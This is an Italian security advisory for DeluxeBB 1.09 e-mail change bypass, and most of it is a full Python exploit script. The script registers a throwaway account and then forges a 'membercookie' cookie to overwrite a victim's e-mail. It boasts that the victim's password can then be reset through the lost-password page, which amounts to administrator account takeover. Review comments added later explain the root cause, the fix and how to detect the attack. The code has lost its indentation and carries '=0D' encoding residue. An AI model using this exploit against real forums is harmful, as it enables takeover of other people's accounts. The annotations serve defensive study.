
DeluxeBB E-Mail Address Change Security Bypass



http://www.opencosmo.com
http://www.opencosmo.com/news.php?readmore=21

###################################################

DeluxeBB E-Mail Address Change Security Bypass
Crediti: Nexen
Applicazione: DeluxeBB
Versione: 1.09
Impatto: Security Bypass
Rischio: [3/5]

Exploit: #!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
# NOTE(review): Python 2 script (print statements, httplib, md5 module).
# The original indentation was lost in the paste (every line sits at column 0
# and lines carry quoted-printable "=0D" residue), so it is not runnable as
# shown; the code is kept byte-identical here for the record.
#
# Root cause, per the docstring below: the profile-update UPDATE keys its
# WHERE clause on the value of the "membercookie" cookie, i.e. the server
# takes the identity of the row to modify from a client-controlled cookie
# rather than from the account it actually authenticated.
# Application-side fix: resolve the current user from the authenticated
# session / memberid, never from a free-form cookie, and bind $xemail and the
# other fields as query parameters instead of interpolating them.
# Detection: a cp.php?sub=settings POST whose membercookie does not match the
# account behind memberid/memberpw, or a fresh registration immediately
# followed by such a request.
'''=0D
_ __ _____ _____ _ __=0D
| '_ \ / _ \ \/ / _ \ '_ \=0D
| | | | __/> < __/ | | |=0D
|_| |_|\___/_/\_\___|_| |_|=0D
=0D
------------------------------------------------------------------------------------------------=0D
=C2=A7 DeluxeBB 0day Remote Change Admin's credentials =C2=A7=0D
------------------------------------------------------------------------------------------------=0D
nexen=0D
------------------------------------------------------------------------------------------------=0D
PoC / Bug Explanation:=0D
When you update your profile,=0D
DeluxeBB execute a vulnerable query:=0D
=0D
$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");=0D
=0D
So, editing cookie "membercookie" you can change remote user's email.=0D
=0D
Enjoy ;)=0D
------------------------------------------------------------------------------------------------=0D
=0D
'''=0D
=0D
=0D
# httplib and md5 are Python 2 modules (http.client / hashlib in Python 3).
import httplib, urllib, sys, md5=0D
from random import randint=0D
# Usage banner; sys.argv[0] is the script name as invoked.
print "\n########################################################################################"=0D
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "=0D
print " "=0D
print " Vulnerability Discovered By Nexen "=0D
print " Greetz to The:Paradox that Coded the Exploit. "=0D
print " "=0D
print " Usage: "=0D
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])=0D
print " "=0D
print " Additional Flags: "=0D
print " -id34 -passMypassword -port80 "=0D
print " "=0D
print " Example: "=0D
print " python %s 127.0.0.1 admin /DeluxeBB/ me@it.com -port81 " % (sys.argv[0])=0D 
print " "=0D
print "########################################################################################\n"=0D
# Requires the four positional arguments from the banner; with fewer it exits
# silently with status 0 (sys.exit() without an argument).
if len(sys.argv)<=4: sys.exit()=0D
else: print "[.]Exploit Starting."=0D
=0D
# Positional arguments: host, victim username, forum path, replacement e-mail.
target = sys.argv[1]=0D
admin_nick = sys.argv[2]=0D
path = sys.argv[3]=0D
real_email = sys.argv[4]=0D
=0D
# botpass: password for the throwaway account registered further down.
# dn1/dn2/dn3 record whether -pass / -id / -port has already been seen.
botpass = "the-new-administrator"=0D
rand = randint(1, 99999)=0D
dn1 = 0=0D
dn2 = 0=0D
dn3 = 0=0D
=0D
# Optional-flag scan over the whole argv (script name and positional
# arguments included) using substring matching, so any argument that happens
# to contain '-pass', '-id' or '-port' (the path or the e-mail, say) would be
# taken as a flag. The elif branches keep resetting the default until the flag
# is seen; the dnN markers stop a later argument from overwriting a parsed
# flag. The bare except swallows whatever was raised and exits without saying
# what went wrong.
try:=0D
for line in sys.argv[:]:=0D
if line.find('-pass') != -1 and dn1 == 0:=0D
upass = line.split('-pass')[1]=0D
dn1 = 1=0D
elif line.find('-pass') == -1 and dn1 == 0:=0D
upass = ""=0D
if line.find('-id') != -1 and dn2 == 0:=0D
userid = line.split('-id')[1]=0D
dn2 = 1=0D
elif line.find('-id') == -1 and dn2 == 0:=0D
userid = ""=0D
=0D
if line.find('-port') != -1 and dn3 == 0:=0D
port = line.split('-port')[1]=0D
dn3 = 1=0D
elif line.find('-port') == -1 and dn3 == 0:=0D
port = "80"=0D
except:=0D
sys.exit("[-]Some error in Additional Flag.")=0D
# `and` binds tighter than `or`: this reads as (pass given without id) or
# (id given without pass). The two flags only count when supplied together;
# otherwise both are dropped and a throwaway account is registered instead.
if upass=="" and userid != "" or userid == "" and upass != "":=0D
print "[-]Bad Additional flags -id -pass given, ignoring them."=0D
upass=""=0D
userid=""=0D
############################################################################################Trying to connect.=0D
# Connectivity probe with an empty request path. Any exception, network or
# not, is reported as a connection problem.
try:=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("GET", "")=0D
except: sys.exit("[-]Cannot connect. Check Target.")=0D
############################################################################################Registering a new user if id or upass not defined=0D
# Without an existing account (-id/-pass), register a throwaway one and read
# its memberid back from the Set-Cookie header. The fixed username/e-mail
# patterns posted here ('th331337.<n>', 'root<n>@yoursystemgotpowned.it') are
# a straightforward signature for registration logs.
try:=0D
conn = httplib.HTTPConnection(target,port)=0D
if upass == "" or userid == "":=0D
conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d@yoursystemgotpowned.it' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})=0D 
response = conn.getresponse()=0D
# getheader() returns None when no Set-Cookie is present; the .split then
# raises the AttributeError handled below.
cookies = response.getheader('set-cookie').split(";")=0D
#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)=0D
print "[.]Registering a new user. -->",response.status, response.reason=0D
conn.close()=0D
############################################################################################Getting memberid in Cookies=0D
# mid is only bound if some cookie fragment contains 'memberid'.
for line in cookies[:]:=0D
if line.find('memberid') != -1:=0D
mid = line.split('memberid=')[1]=0D
############################################################################################Isset like starts=0D
# PHP-style isset(): referencing mid raises NameError if the loop above never
# bound it. (Indentation is lost, so whether this nests inside the if above
# can only be inferred — presumably it does.)
try: mid=0D
except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")=0D
except AttributeError:=0D
sys.exit("[-]AttributeError Check your Target/path.")=0D
############################################################################################Doing some Md5=0D
# memberpw is the unsalted MD5 of the password, matching the cookie format
# sent in the Cookie header below. NOTE(review): a password hash travelling in
# a cookie means any cookie leak is a credential leak. `hash` shadows the
# builtin of the same name.
if upass=="" or userid=="":=0D
hash = md5.new()=0D
hash.update(botpass)=0D
passmd5 = hash.hexdigest()=0D
else:=0D
hash = md5.new()=0D
hash.update(upass)=0D
passmd5 = hash.hexdigest()=0D
mid = userid=0D
############################################################################################Updating "victim" email in Profile=0D
# The bypass itself: memberid/memberpw authenticate one account while
# membercookie names a different user (admin_nick). Because the UPDATE's WHERE
# clause uses membercookie (see docstring), the named user's e-mail is
# overwritten. The server-side mitigation is to derive the target row from the
# authenticated memberid, not from membercookie.
conn = httplib.HTTPConnection(target,port)=0D
conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})=0D
response = conn.getresponse()=0D
print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason=0D
conn.close()=0D
# An e-mail change escalates to account takeover through the lost-password
# flow, which is why a profile e-mail update must be bound to the
# authenticated account (and is worth re-confirming via the old address).
print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"=0D
=0D
Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.
